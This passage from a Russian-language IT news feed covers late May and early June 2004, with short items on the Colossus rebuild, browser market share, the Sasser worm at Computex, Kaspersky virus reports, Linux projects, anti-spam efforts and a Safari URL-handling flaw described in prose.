Группа энтузиастов завершила 11-летнюю работу по воссозданию Colossus Mk2, первого электронного компьютера, использовавшегося в годы войны для поиска ключей к зашифрованным немецким сообщениям. Его предшественником был запущенный 1 февраля 1944 Mk1, показавший принципиальную возможность использования электроники для статистической атаки на шифр. Остававшийся засекреченным до 70-х годов, Colossus на два года опередил Eniac. Хотя, по словам руководителя Colossus Rebuild Project Тони Сейла, мало кто верил, что его полторы тысячи ламп проработают больше десятка секунд, Colossus не выключали до конца войны. Всего было построено 10 машин, дешифровавших в сумме около 63 миллионов символов, но после войны большинство машин было уничтожено. Скорость Colossus вполне сопоставима со скоростью современных универсальных компьютеров, доведись им работать над той же задачей
Bugtraq.ru

2/06/2004 16:17 Во Франции выпущен диск-самоубийца
Французская компания разработала DVD-диск, способный самоуничтожаться уже через несколько часов после вскрытия упаковки. Диск, как пишет The Register, сделан из обычного пластика, в состав которого включен, тем не менее, дополнительный слой легко окисляющегося материала, который и является средством уничтожения диска. В зависимости от толщины дополнительного слоя, диск становится непригодным для использования в пределах 8-24 часов после вскрытия фирменной упаковки. Создатели DVD-D (DVD Disposable) утверждают, что их творение превосходит схожий по принципу действия самоуничтожающийся диск, продемонстрированный в минувшем году американской компанией Flexplay Technologies. Во-первых, такой диск, вроде бы, дешевле в изготовлении, а во-вторых, он практически не поддается восстановлению после окисления защитного слоя. То есть, восстановить его, конечно, можно, но это потребует столько времени и сил, что обладателю диска будет проще приобрести еще одну копию, чем возиться с умершей.
internet.ru

2/06/2004 15:53 Новые данные о популярности браузеров
Компания OneStat.com подвела итоги очередного исследования распространенности различных веб-браузеров, сообщает "Компьюлента". Данные были собраны на основе статистики сайтов, использующих сервисы OneStat.com. Всего исследованием были охвачены около 2 млн. пользователей более чем 50 тысяч сайтов из ста стран мира. Данные усреднялись по неделям. По данным OneStat.com, в последнее время наблюдается незначительное снижение доли лидера рынка - браузера Microsoft Internet Explorer. Если ранее доля этого браузера достигала 95-97%, то в ходе последнего исследования доля IE находилась на уровне 93,9%. Нужно отметить, что уменьшение доли браузера Microsost очень невелико и вполне может укладываться в погрешность измерений. Большинство пользователей отдают предпочтение последней, шестой версии IE - ее доля на рынке приближается к 70%. Браузерами Microsoft версий 5.5 и 5 пользуются, соответственно, 12,9% и 10,8% участников исследования. На долю четвертой версии IE приходится 0,6% браузерного рынка. Вслед за Internet Explorer идет Mozilla: все версии этого браузера, включая Mozilla Firefox занимают 2,1% рынка программ для работы с WWW. Доля Opera 7 составляет 1,02%, а распространенность браузера Apple Safari увеличилась по сравнению с прошлым исследованием втрое - до 0,71%. Однако, как уже говорилось, величины менее 1%, скорее всего, лежат в переделах погрешности измерений
Отчёт

2/06/2004 15:29 Проект Linux Registry
Довольно любопытный проект развивается в рамках проекта SourceForge. Название проекта - Linux Registry. Знакомое название, не правда ли? ;) Развивается (судя по описанию) при активной поддержке Linux-подразделения IBM господином Avi Alkalay. Собственно, сама идея сводится к некоторой попытке "виндоузизации" конфигурационных файлов. Вместо разбросанных (в основном в директории /etc) конфиг-файлов, предлагается некое упрощённое представление (в XML-формате) всех параметров. Собственно, сам Linux Registry более всего представляет собой библиотеку/API для обеспечения разработчиков необходимым интсрументарием. Утверждается, что редактировать различные конфигурационные параметры (ключи) проще, правя единый конфиг файл, где всё сведено вместе в XML-формате. Честно говоря, довольно спорное утверждение. Проект довольно неоднозначный и, наверняка, найдёт как своих сторонников, так и ярых противников.
Cайт проекта

2/06/2004 15:08 Червь Sasser погрузил в хаос техническую выставку в Тайбэе
Сетевой червь Sasser парализовал работу технической выставки Computex, проходящей в столице Тайваня Тайбэе. Для исправления ситуации служба технической поддержки выставки вынуждена была в спешном порядке устанавливать на компьютеры критические обновления. С их помощью инженеры сумели устранить используемую червем уязвимость операционной системы, сообщает сайт The Register. Атака червя Sasser на ресурсы Computex стала очень печальным событием для организаторов выставки. В ходе церемонии ее открытия было заявлено о том, что гости мероприятия сумеют получить высокоскоростной доступ в интернет. Однако действие вредоносной программы фактически свело на нет все обещания устроителей Computex. Sasser вывел из строя системы регистрации, в результате чего участники выставки вынуждены были на жаре выстраиваться в длинные очереди и заново заполнять все необходимые формы. Инцидент на выставке произошел почти одновременно с заявлением тайваньских властей об аресте автора другой вредоносной программы - троянца Peep.
Источник

2/06/2004 14:21 Обзор вирусной активности за май 2004 от "Лаборатории Касперского"
Опубликован очередной отчёт вирусной активности за май нынешнего года от "Лаборатории Касперского". Согласно этого обзора первых четыре места с большим отрывом занимают разновидности червя Netsky: aa - 31,47%, b - 30,98%, q - 6,89%, y - 5,03%. На пятом месте обосновался недавно появившийся червь Bagle - 5,00%. В мае 2004 года произошло сразу несколько знаковых событий в истории компьютерной вирусологии. Во-первых, появление очередного сетевого червя Sasser, распространяющегося через уязвимость в Microsoft Windows. Во-вторых - арест в Германии автора данного червя. Таким образом, произошла смена лидера, и чемпион марта-апреля, NetSky.b, опустился на второе место. Правда, разрыв между двумя червями составляет всего полпроцента. Совсем чуть-чуть удалось вмешаться в тотальное превосходство NetSky двум новым червям из стана их «вечного врага» - Bagle. Два новых варианта появились в рейтинге, причем один из них, Bagle.z, смог сразу взобраться на пятое место. У второго новичка, Bagle.y, показатели гораздо скромней - всего лишь 15 место. Несколько месяцев планомерного падения в рейтинге червей семейства Sober и их полное отсутствие в апрельской двадцатке, вероятно, послужили толчком к появлению очередного - седьмого варианта (Sober.g), который пока еще находится в нижней части таблицы. Черви семейства Mydoom не только смогли удержаться в хит-параде, но еще и практически не утратили своих позиций, балансируя на грани первой и второй «десятки».
Отчёт

2/06/2004 12:52 Intel откроет код для загрузки ПК и серверов
Intel совместно с компанией CollabNet обещает открыть исходный код программы, которая делает процесс загрузки ПК и серверов более предсказуемым и быстрым. По заключенному компаниями соглашению в этом году Intel выпустит по лицензии Common Public License комплект ПО для разработки драйверов, а также то, что она называет firmware foundation code. Этот код станет результатом проекта Intel Tiano, цель которого — заменить программное обеспечение BIOS (basic input-output system), которое ведет учет составляющей компьютера или подключенной к нему аппаратуры и позволяет устройствам взаимодействовать с операционной системой и в конечном счете с приложениями. Открыв исходный код, Intel предоставит производителям аппаратуры больше возможностей по эффективному написанию драйверов и упростит внесение изменений в систему ввода-вывода. К тому же Intel firmware foundation code будет написан на языке С. «Прозрачность позволит людям использовать код с большей уверенностью, — говорит менеджер по программному обеспечению платформы Intel Майк Ричмонд. — BIOS присутствует в ПК с первого дня его существования и всегда была монолитным куском кода». Ожидается также, что новый код и проект Tiano ускорят процесс загрузки. Серверы на базе Tiano загружаются почти на две трети быстрее, чем серверы с традиционными версиями BIOS, утверждает Ричмонд. ПО загрузки на базе Tiano продают компании American Megatrends и Insyde Software. В Tiano реализован интерфейс Extensible Firmware Interface — промышленный стандарт, официально называемый Intel Platform for Innovation Framework for EFI. Intel категорически отказывается называть Tiano BIOS, но и то и другое выполняет одни и те же функции. Программисты open source работали над аналогичным проектом LinuxBIOS, нацеленным на замену стандартного ПО BIOS компактной версией, основанной на Linux. Проблемы с проприетарными программами BIOS мешали обеспечить Linux-поддержку для интерфейса Advanced Configuration Power Interface, без которого невозможно выполнять такие действия, как перевод ноутбуков в экономичные режимы работы.
ZDNET

2/06/2004 12:33 Специальные программы вычислят любителей интернет-рефератов по всему миру
Ученый из университета города Абердин (Шотландия) Роберт Гордон объявил всей мировой студенческой общественности, что скоро все сайты, содержащие работы студентов, попадут под жесткий контроль, что позволит вычислять любителей плагиата. По сообщению BBC News, в распоряжении сторонников соблюдения авторских прав находится недавно разработанный аппаратно-программный комплекс Turnitin tool способный одновременно проверять работу сразу 800 миллионов web-страниц, содержащих более 4,5 миллиардов рефератов. Принцип работы системы Turnitin несложен. Сначала проводится разбивка подлежащего анализу документа на небольшие отдельные фрагменты текста. После этого полученные данные сравниваются с другими фрагментами в колоссальной базе с помощью статистического алгоритма. В базе данных хранятся произведения классиков, а также все, что находится на сайтах, содержащих шпаргалки и готовые учебные и научные работы. База постоянно пополняется теми работами, которые были предоставлены на экспертизу плагиата. В случае обнаружения текстуальных совпадений система выдает предупреждение, после чего фрагмент текста помечается и возвращается преподавателю или другому ответственному лицу, которое принимает окончательное решение по вопросу о заимствованиях. Сейчас Turnitin проходит испытания в Кентском Университете. Согласно планам Гордона в Turnitin будут помещаться все новые работы студентов. Преподавателей вузов, сообщает BBC News, твердо намерены положить конец "эпохе "copy and paste" ("копировать и вставить").
Источник

1/06/2004 14:54 Новый язык программирования High Level Assembly (HLA)
Как сообщает Slashdot, разработчик по имени Randall Hyde сообщил о создании им нового языка программирования, получившего название High Level Assembly (HLA). Сообщается, что язык предоставляет обширные возможности программистам для создания приложений как для платформы Windows, так и для Linux. Работает с большиством современных ассемблеров - Gas, Fasm, Masm и др. Насколько жизнеспособным окажется новый язык - покажет (как всегда) время. Желающие приобщиться и пощупать новый язык могут посетить Вэб-сайт, посвящённый новому языку.
Сайт проекта

1/06/2004 14:31 Slackware тоже переходит на X.Org
На настоящий момент дистрибутив Linux Slackware оставался единственным дистрибутивом, который в качестве X-сервера и набора утилит использовал XFree86 4.4.0 (в ветви Current). 30 мая было заявлено о переходе на X.Org. Об этом от имени команды разработчиков объявил Patrick Volkerding. Напомним, что в RedHat дистрибутиве Fedora Core тоже используется X.Org.
ChangeLogs

1/06/2004 14:18 Opera и Mozilla начинают сотрудничество
На сайте консорциума W3C соответствующие группы разработчиков многоплатформенных Web-браузеров Opera и Mozilla опубликовали документ, где обнародовали совместную стратегию совершенствования своих продуктов. Основная цель сотрудничества — облегчить разработку Web-приложений, которые корректно функционировали бы в обоих браузерах. Основные точки соприкосновения следующие: обеспечение обратной совместимости и прозрачной миграции на новые технологии, четко определенные сценарии обработки ошибок, введение только необходимой функциональности, использование сценарного языка, отсутствие привязки к конкретной платформе и открытый процесс разработки. В качестве основных стандартов Web-приложений предлагается использовать спецификации HTML, CSS, DOM и JavaScript.
nixp.ru

1/06/2004 13:57 Российским спамом заинтересовались на Западе
Организация экономического сотрудничества и развития (ОЭСР) выпустила обзор ситуации с правовым регулированием несанкционированных рекламных рассылок - спама - в европейских странах, не входящих в ОЭСР. Эксперты организации рассмотрели ситуацию в Болгарии, на Кипре, в Латвии, Литве, Мальте, России, Румынии, Словении, Украине и Эстонии. Признавая спам глобальной проблемой, ОЭСР считает важной задачей координацию усилий всего мирового сообщества в борьбе с этим явлением. Одним из первых шагов в этом направлении является гармонизация подхода к определению термина «спам» и координация усилий всех европейских стран в борьбе с ним. Как следует из обзора, законодательства всех попавших в него стран в той или иной степени запрещают или ограничивают распространение спама. Исключениями пока являются Россия и Украина, однако и в этих странах существуют инициативные группы, занимающиеся разработкой соответствующих дополнений к законодательству. Кроме того, часть представленных стран - Кипр, Латвия, Литва, Мальта, Словения и Эстония - в скором будущем должны будут принять более жесткие меры по противодействию распространению спама, в связи со вступлением в Евросоюз. Комментируя публикацию обзора, координатор проекта «АнтиСпам» Евгений Альтовский отмечает, что приведенные в нем данные могут оказаться неполными. «Авторам обзора не хватало информации на английском языке по данной проблематике в России, - говорит г-н Альтовский, - так, принятый в первом чтении ФЗ «Об электронной коммерции» авторы обзора посчитали уже действующим правовым актом. В то же время, такой важный в этой области документ, как ОФИСП-008, оставался вне поля их зрения».
CNEWS

1/06/2004 13:31 За охрану интеллектуальной собственности США поставили Украине двойку
В ежегодном докладе Соединенных Штатов о нарушениях прав интеллектуальной собственности (ПИС) в мире вновь упоминается Украина, которая по-прежнему не в состоянии защитить от пиратства такие информационные носители, как компакт-диски (CD) и универсальные цифровые диски (DVD). Отдел Торгового представителя Соединенных Штатов (ТП США) сообщил 3 мая 2004 года, что в его "Специальном докладе 301" перечислены 52 страны, где есть проблемы с ПИС, но "приоритетной зарубежной страной" названа только Украина. Ежегодный "Специальный доклад 301", выпускаемый по Торговому закону США 1988 года, гласит, что многие развивающиеся страны и новые члены Всемирной торговой организации (ВТО) добиваются прогресса на пути к выполнению своих обязательств в борьбе с контрафактной продукцией по Соглашению ВТО о торговых аспектах прав интеллектуальной собственности (ТРИПС), но проблемы остаются, особенно в области контроля. Об Украине ТП США сообщил, что ее "хроническая неспособность" эффективно противодействовать пиратскому тиражированию оптических носителей и выполнять связанные с ПИС законы может поставить под угрозу срыва украинские попытки вступить в ВТО. Украина по-прежнему будет определена как приоритетная зарубежная страна, и наложенные в январе 2002 года украинские санкции в размере 75 млн. долларов останутся в силе. ТП США включил 33 торговых партнера в "контрольный список" за нарушения ПИС, а еще 16 торговых партнеров попали в "приоритетный контрольный список", подразумевающий более пристальное внимание. ТП США вновь решил подвергнуть Китай и Парагвай мониторингу по "Специальному докладу 301". Это означает, что ТП США может перейти непосредственно к применению торговых санкций в отношении любой из этих стран, если мониторинг выявит спад в выполнении двусторонних соглашений о правах интеллектуальной собственности.
Подробности на crime-research.ru

1/06/2004 12:09 Проект GRSecurity прекращает свое существование
Как ни печально, но проект GRSecurity будет закрыт. Об этом заявил автор на странице своего Вэб-сайта. GRSecurity предназначался для внесения патчей в ядро Linux для обеспечения безопасности ядра (нечно подобное выполняет и набор патчей от SolarDesigner-а под названием OpenWall). Как пишет сам автор, закрытие проекта связано с прекращением спонсорского финансирования и с необходимостью зарабатывать деньги на прокорм семьи. Судя по всему, на развитие проекта просто не хватает времени. На сайте также сообщается о том, что после 7 июня сам вэб-сайт, форумы, списки рассылки и репозитарий CVS прекратят своё существование (если до этой даты не найдётся спонсора). Ну что же, остаётся ещё проект SELinux.
Подробности

1/06/2004 11:43 «Комбеллга» развела Wi-Fi в московских отелях
«Комбеллга» запустила в эксплуатацию две сети беспроводного доступа по технологии Wi-Fi в московских отелях Penta Renaissance и «Аэростар». Об этом сообщает «Прайм-Тасс» со ссылкой на пресс-релиз американской компании Cisco Systems, поставившей оборудование и технологические решения для этих проектов. Построение сети Wi-Fi на основе оборудования Cisco Systems — мировой стандарт, принятый во всех отелях Penta Renaissance. Все гости любого из отелей Penta обеспечены доступом в интернет, в какой бы точке отеля они не находились. Сеть Wi-Fi по протоколу 802.11b построена в Penta Renaissance на основе 29 базовых станций (точек доступа) Cisco Aironet 1100 Series. Радиус покрытия одной точки доступа составляет около 300 метров, при этом она одновременно может поддерживать несколько десятков активных пользователей и обеспечивает скорость передачи информации для конечного абонента до 2 Мбит/с. Управление сетью осуществляется при помощи Cisco Building Broadband Solution Manager (BBSM). Эта разработка Cisco обеспечивает управление, биллинг, настройку и разработку различных сервисов, а также имеет широкий спектр интерфейсов в популярные гостиничные системы управления (Property Management Systems). Доступ к услуге осуществляется при помощи беспроводных сетевых карт в ноутбуках или карманных компьютерах. Карта Wi-Fi стандарта PCMCIA, если ноутбук гостя ей не оснащен, может выдаваться за небольшую плату на время пребывания в отеле.
Источник

1/06/2004 11:19 В Тайбэе открывается выставка Computex 2004
С 1 по 5 июня 2004 года в столице Тайваня, городе Тайбэе, пройдет крупнейшая в Азии выставка высоких технологий Computex Taipei 2004. Если в прошлом году из-за эпидемии атипичной пневмонии, охватившей страны региона, выставку пришлось перенести на сентябрь, то в текущем году Computex открывается строго в соответствии с намеченным графиком. Местом проведения выставки, как и прежде, останется Центр международной торговли Тайбэя, однако в 2004 году Computex будет расширена и займет также здание Центра международных форумов Тайбэя. По сравнению с прошлым годом, число компаний, намеренных принять участие в выставке, увеличится с 1241 до 1500 фирм. Специалисты прогнозируют, что главное место в экспозиции 2004 года займут компьютерные комплектующие, поддерживающие перспективный интерфейс PCI Express. Еще на выставке CeBIT 2004, проходившей в марте в немецком Ганновере, демонстрировались образцы материнских плат на основе новых чипсетов Intel под кодовыми названиями Alderwood и Grantsdale, работающих с PCI Express. На Computex 2004 ожидается официальная презентация этих наборов системной логики, после чего системные платы на их основе начнут появляться на прилавках магазинов.
Компьюлента

1/06/2004 10:56 Macromedia испытывает обновление для Flash
Бета-версия с кодовым названием Ellipsis в настоящее время тестируется и готовится к выпуску этим летом. Macromedia проводит испытания обновления к своему основному набору инструментов для создания веб-контента и приложений в формате Flash. Недавно разработчикам Macromedia, зарегистрированным в качестве бета-тестеров, предложили подписаться на четыре бета-версии продукта с кодовым названием Ellipsis. Представитель компании сообщил, что пакет выйдет ближе к концу лета в виде бесплатного обновления для Flash MX 2004 и будет содержать главным образом усовершенствования, повышающие производительность и стабильность ПО. Это часть проекта Macromedia по превращению Flash в среду для создания веб-приложений. Первоначально формат Flash применялся для представления в вебе простых анимаций, таких как мерцающие банеры, ставшие синонимом этого формата. Однако добавив в 2002 году инструменты разработки Flash MX, Macromedia начала позиционировать свой формат в качестве широкой платформы для создания целых веб-страниц, пользовательских интерфейсов и простых веб-приложений. Компания старается также привлечь массового разработчика к Flash при помощи Flex, серверного продукта, который переводит приложения с платформ Sun Microsystems Java и Microsoft .Net на дружественный Flash диалект языка XML (Extensible Markup Language).
Подробности

31/05/2004 20:00 Новые уязвимости в браузере Safari
Еще несколько ошибок обнаружены в браузере Safari, которые позволяет составить URL, при переходе по которому будет исполнена зашифрованная в нем команда Mac OS X. Ошибка возникает при разборе URL при использовании протоколов, отличных от HTTP. В частности, при обращении к SSH можно при помощи параметра ProxyCommand указать исполнение внешнего сценария. Записать потенциально опасный сценарий на компьютер пользователя можно с помощью другой ошибки, которая была до этого обнаружена в другом браузере Opera, но, по заявлениям некоторых исследователей, под Mac OS она проявляется и в Safari, Firefox, OmniWeb, IE, iCab и TrailBlazer. Она возникает при обработке протокола telnet и позволяет записать на компьютер файл из внешней среды. Исправлений для обоих ошибок пока нет, поэтому рекомендуется аккуратно пользоваться URL-ссылками, начинающимися с префиксов «ssh://» и «telnet://» и по возможности не активизировать их.
nixp.ru

31/05/2004 15:35 Недельный отчет о вирусах Panda Software
Опубликован традиционный еженедельный отчёт о вирусной активности прошедшей недели от компании Panda Software. В отчёте рассмотрены черви Bobax.D и версии A и B червя Korgo.
Отчёт

31/05/2004 15:31 Windows Server 2003 R2 беглым взглядом
На конференции Tech Ed специалисты Microsoft провели короткую демонстрацию новых функций Windows Server 2003 R2 - обновления серверного варианта операционной системы, которое планируется выпустить во второй половине будущего года. В числе продемонстрированных - технология Remote Differential Compression, повышающая скорость обмена данными между центральным офисом и филиалами при тиражировании за счет передачи только изменений, но не файлов целиком; механизм проверки конфигурации вновь подключающихся к корпоративной сети компьютеров на соответствие принятой в ней политике безопасности Client Inspection and Isolation; служба единого входа Active Directory Federation Services; технология Anywhere Access, предоставляющая доступ к электронной почте и другим службам корпоративной сети без организации VPN. В Microsoft подчеркивают, что Anywhere Access призвана стать дополнением к виртуальным частным сетям, а не их заменой. Следующим после R2 крупным релизом серверного варианта Windows по плану станет Longhorn Server, который предполагается выпустить в 2007 году.
Источник

31/05/2004 14:49 Еще один московский Ethernet-оператор вводит неограниченные тарифы
По сообщению компании "Веском" (Москва), с 1 июня 2004 г. вводятся тарифы с неограниченным объемом трафика. Работа на скорости 64 kbps будет стоить 400 руб/мес; 128 kbps - 700 руб/мес; 256 kbps - 1000 руб/мес включая все налоги. Компания также сообщила о вводе в строй нового магистрального канала с пропускной способностью 10 Mbps, запуск которого, по-видимому, приурочен к внедрению "анлимитных" тарифов. Компания "Веском" является оператором широкополосного доступа по технологии Ethernet в московских районах Царицыно, Орехово-Борисово, Марьино, Измайлово, Каховка и Соколиная Гора.
Подробнее

31/05/2004 14:27 Банки и страховые фирмы захлестнул поток кибератак
В прошлом году были взломаны информационные системы свыше 80% мировых финансовых учреждений, утверждается в отчете. Во всем мире усиливаются кибератаки на ИТ-системы банков и страховых компаний. Согласно исследованию, проведенному компанией Deloitte Touche Tohmatsu, почти 83% респондентов сказали, что их системы в прошлом году были взломаны, тогда как в 2003 году таких респондентов было 39%. Почти 40% организаций, чьи системы были атакованы, понесли финансовые потери. Исследование основано на интервью с руководителями служб безопасности 100 ведущих мировых финансовых учреждений. Несмотря на рост интенсивности атак, не все компании увеличивают бюджет службы безопасности. Около 5% опрошенных сказали, что их секьюрити-бюджеты остаются неизменными, а 10% — что их бюджеты сократились по сравнению с прошлым годом. За год процент компаний, которые в полной мере применяют антивирусные средства, сократился с 96% до 87%. А одна треть респондентов считает, что технологии защиты в их компаниях используются неэффективно.
Источник

31/05/2004 13:46 Материнская плата VIA Epia SP со встроенной системой безопасности
Компания VIA Technologies представила новую материнскую плату Epia SP, построенную на основе чипсета VIA CN400 (северный мост) и VIA VT8237 (южный мост). Модель поддерживает аппаратное ускорение обработки MPEG-2 и MPEG-4 и, кроме того, имеет фирменную систему безопасности VIA PadLock Hardware Security Suite, обеспечивающую возможность шифрования/дешифрования данных при минимальной загрузке центрального процессора. Материнская плата использует чип VIA C3/ VIA Eden EBGA, оборудована одним разъемом DDR 266/333/400 DIMM (максимальный объем оперативной памяти составляет 1 Гб), а также одним слотом PCI. Графическая подсистема основана на встроенном контроллере UniChrome Pro AGP, имеются два разъема Ultra DMA 133/100 и два порта Serial АТА для подключения жестких дисков. Помимо этого, новинка оборудована сетевым контроллером 10/100 Base-T Ethernet (VIA VT6103), шестиканальным звуковым кодеком АС'97 (VIA VT1617A) и контроллером IEEE 1394 Firewire (VIA VT6307S). Порты ввода/вывода системной платы Epia SP включают два гнезда PS/2, разъем D-Sub для подключения монитора, ТВ-выход S-Video, последовательный порт, два порта USB 2.0, линейный аудиовыход, линейный аудиовход и гнездо для подключения микрофона. Плата выполняется в форм-факторе Mini-ITX с размерами 170 х 170 мм.
compulenta

31/05/2004 13:14 Тайваньский инженер помогал китайским хакерам
Власти Тайваня арестовали 30-летнего инженера Ван Пин Ана, подозреваемого в создании и распространении троянской программы Peep, сообщает Associated Press. Ван Пин размещал свою программу на веб-сайтах, где ее могли найти китайские хакеры. По мнению тайваньcких властей, автор Peep таким образом создавал серьезную угрозу для деловых и правительственных структур острова. «Он поместил свою программу на популярных хакерских ресурсах и призывал пользователей скачивать ее. Возможно, Ван Пин хотел лишь продемонстрировать свои умения, но он должен был осознавать, какую создает угрозу», - отметил представитель тайваньских властей. Если Ван Пин Ана признают виновным в посягательстве на общественную и корпоративную собственность, его ожидает лишение свободы на срок до пяти лет. Расследование в связи с распространением программы Peep началось несколько месяцев назад, после того, как хакеры сумели похитить файлы с секретными правительственными данными. Следствие установило, что к похищению информации из сотен тайваньских школ, компаний и государственных агентств причастен «троянец» Peep. Почти все хакерские атаки были совершены из Китая.
Источник

31/05/2004 12:06 RFiKey уже в России
Компания Rainbow Technologies (www.rainbow.msk.ru) начала продажи RFiKey - первого в индустрии электронного USB-ключа, обеспечивающего также управление физическим доступом в здания и помещения. RFiKey представляет собой персональный USB-идентификатор iKey, интегрированный с чипом бесконтактного управления доступом компании HID Corporation (www.hidcorp.com), что обеспечивает надёжную двухфакторную аутентификацию при осуществлении доступа к корпоративным данным и приложениям, а также управление физическим доступом в здания и помещения. Это небольшое устройство вставляется в USB-порт компьютера для подтверждения прав и полномочий пользователя в вычислительной сети предприятия, а для доступа в режиме помещения пользователь должен носить RFiKey с собой. Если извлечь RFiKey из USB-порта, сессия прерывается и блокирует доступ с этого компьютера в корпоративную сеть. В качестве устройства разграничения прав физического доступа RFiKey действует аналогично proximity-картам на частоте 125 кГц и совместим со считывателями информации компаний HID и PARSEC.
Источник

30/05/2004 20:53 ServerSide.com блокирует JBoss
Несколько недель назад компания JBoss, продвигающая одноименной открытый сервер приложений, и ее руководитель Марк Флери (Marc Fleury) подверглась резкой критики из-за попытки дискредитировать продукцию конкурентов путем отправки ложных сообщений на популярные web-сайты, в частности, JavaLobby и TheServerSide.com. Сообщения отправлялись анонимно или же с использованием ничего не значащих имен, однако, IP-адрес, с которого это было сделано, принадлежал JBoss Inc. Вчера компания Middleware Company, владеющая TheServerSide.com, объявила о разрыве отношений с JBoss. "Мы пытались решить эту проблему дипломатическим путем, ... однако, нестабильность и непрофессиональное поведение JBoss и ее президента Марка Флери разрушили наш оптимизм в достижении соглашения. Мы извиняемся за неудобства, причиненные JBoss Inc",-говорится в заявлении компании. "Лично мне не нужна маска для того, чтобы высказать свое мнение и одна из вещей, которые я не переношу - это двуличность",-ответил Марк Флери.
LinuxCenter.ru

30/05/2004 20:35 Проблемы в Fedora Core 2
Cогласно сообщениям на многих новостных порталах, в Fedora Core 2 обнаружена довольно серьёзная проблема, связанная с невозможностью загрузки нескольких ОС. В частности, после установки GRUB (загрузчик, пришедший на смену традиционному LILO) отмечена невозможность загрузки ОС Windows XP/2K/2003. Cудя по всему, проблема скрывается в несогласованности информации о конфигурации жёсткого диска в BIOS и в ядре Linux. Честно говоря, не совсем понятна позиция разработчиков из доблестной Red Hat, поскольку проблема была замечена ещё в феврале текущего года и нашла отражение в репозитарии ошибок (bugzilla). Отрадно, что описание решения проблемы тоже уже опубликовано Jack Aboutboul. Для устранения этого "бага" достаточно применить утилиту sfdisk. Подобная проблема совершенно не на руку разработчикам из Red Hat, которую после выпуска первой "Федоры" всё чаще упрекают в "попсовости" в мире Linux.
Обсуждение проблемы
Методы её решения

30/05/2004 13:49 Вышло обновление ОС КПК Toshiba e800/e805
Для владельцев КПК Toshiba. Европейское подразделение компании Toshiba опубликовало обновление операционной системы КПК Toshiba e800/e805 до версии Windows Mobile 2003 SE, cообщает mobile-review.com. Для данного – первого на рынке VGA PocketPC КПК текущее обновление ОС было особо ожидаемым.
Скачать обновление

30/05/2004 13:26 И все-таки Lindows останется Lindows
Голландский суд, стараниями которого операционная система Lindows превратилась в Lin---s, а потом – в Linspire, все-таки разрешил американской компании использовать торговую марку Lindows в качестве своего имени. Очередной виток судебных разбирательств начался после того, как компания, покорно сменившая название своей операционной системы Lindows на оппортунистический вариант Linspire и установила редирект на сайт linspire.com, подверглась новым нападкам со стороны адвокатов Microsoft. Редмонский левиафан, почуявший запах крови и страха, попытался добить крохотного конкурента в его норке. По мнению Microsoft, использование слова «Lindows» в качестве названия компании наносило ущерб принадлежащей Microsoft торговой марке Windows. Тем не менее, сообщает PC World, на этот раз машина сутяжничества дала сбой: вынося решение, голландский судья принял во внимание тот факт, что Lindows уже фактически на является торговой маркой, а используется только в документации к операционной системе Linspire. Кроме того, компания вполне четко указывает, что Lindows не имеет никакого отношения к Microsoft.
internet.ru

30/05/2004 12:43 Бета-тестирование Антивируса Касперского® 5.0 для Sendmail с Milter API
"Лаборатория Касперского" сообщает о начале бета-тестирования Антивируса Касперского® 5.0 для Sendmail с Milter API. Необходимо отметить уникальность данной разработки. В продуктовой линейке "Лаборатории Касперского" впервые появится продукт, созданный специально для антивирусной защиты почтовой системы Sendmail с поддержкой технологии Milter API. Антивирус Касперского для Sendmail с Milter API предназначен для обеспечения антивирусной безопасности почтового трафика Linux\Unix-сервера. Продукт функционирует совместно с почтовой системой Sendmail, поддерживающей Sendmail"s Content Management (Milter) API. Milter API - интерфейс, предоставляющий внешним программным приложениям доступ к почтовым сообщениям, обрабатываемым Sendmail. Тем самым он позволяет осуществлять дополнительную обработку и редактирование содержимого и мета-данных почтового сообщения. Анализ входящего и исходящего почтового трафика обеспечивает надежный контроль над источниками проникновения вредоносных кодов. В случае необходимости, программный комплекс быстро и надежно нейтрализует вирус, полностью исключая его дальнейшее распространение.
Условия бета-тестирования

30/05/2004 12:19 Тенденции развития вредоносных программ, май 2004
Вирусный аналитик «Лаборатории Касперского» Алиса Шевченко на сайте viruslist.ru опубликовала обзор, в котором рассматривваются основные тенденции развития вредоносных программ, наблюдающиеся в мае текущего года. В отличие от начала весны, ознаменованного эпидемиями однотипных и эксплуатирующих, в основном, «человеческий фактор» почтовых червей I-Worm.Mydoom, I-Worm.NetSky и I-Worm.Bagle, май отмечен появлением большого количества вредоносных программ, распространяющихся через технические уязвимости, а не социальные факторы. Важнейшие события ушедшего месяца - одна свежая, но уже активно используемая вирусописателями уязвимость и сразу две принципиально новых разновидности вредоносных программ. Войны почтовых (I-Worm) червей поутихли, вирусописатели сконцентрировались на новых возможностях, и очень быстро в интернете появился внушительный набор вредоносных программ, распространяющихся через вышеупомянутую уязвимость. Отдельного внимания заслуживают две из них, получившие значительное распространение к концу мая: TrojanProxy.Win32.Bobax («троянец»-прокси, в котором функция размножения вызывается по команде извне) и Worm.Win32.Padobot (червь с функцией «бэкдора»). Безоговорочным «хитом» списка майских вирусных новинок можно считать Win64.Rugrat.a - первый вирус, родной средой обитания которого является Windows для 64-битной платформы Intel, IA64. Этот по большей части концептуальный (вследствие малой распространенности и узкой на сегодняшний день области применения данной 64-битной архитектуры) вирус - потомок Win32.Chiton, впервые обнаруженного 2 года назад. В связи с особенностями архитектуры IA64 написание вирусов для нее - более сложная задача, чем в случае с привычной нам архитектурой x86.
Обзор

30/05/2004 10:44 Украинские интернет-провайдеры: Спамеров нужно «мочить»
Украинские интернет-провайдеры обсудили методы борьбы с не заказанными рекламными сообщениями (спамом). «Круглый стол», посвященный борьбе со спамом, состоялся в рамках конференции по вопросам развития интернет в Украине, которая проходит в Судаке. По мнению ряда участников обсуждения, в Украине необходимо ввести законодательное ограничение спама. В то же время некоторые провайдеры отметили недостаточность этих мер, считая, что существующая в Украине законодательная база позволяет уже сейчас привлекать спамеров к ответственности, а несколько показательных процессов будут способствовать существенному уменьшению спама в стране. Наибольшие нарекания со стороны интернет-провайдеров вызвала деятельность так называемого «Национального бизнес центра». Они считают, что именно к этой организации необходимо в первую очередь применить предусмотренные законодательством меры. Участники «круглого стола» обсудили также возможность технической фильтрации спама, необходимость создания «черного списка» адресов, с которых он распространяется. В то же время отмечалось, что использование такого фильтра приведет к задержке не только спама, но и необходимых сообщений, сообщают «Подробности». Провайдеры решили продолжить работу по противодействию спаму в рамках комитета Интернет-ассоциации Украины (ИнАУ) по вопросам безопасности и предупреждения правонарушений в информационных системах.
forUm

30/05/2004 10:07 Обновление книги TCP/IP Illustrated
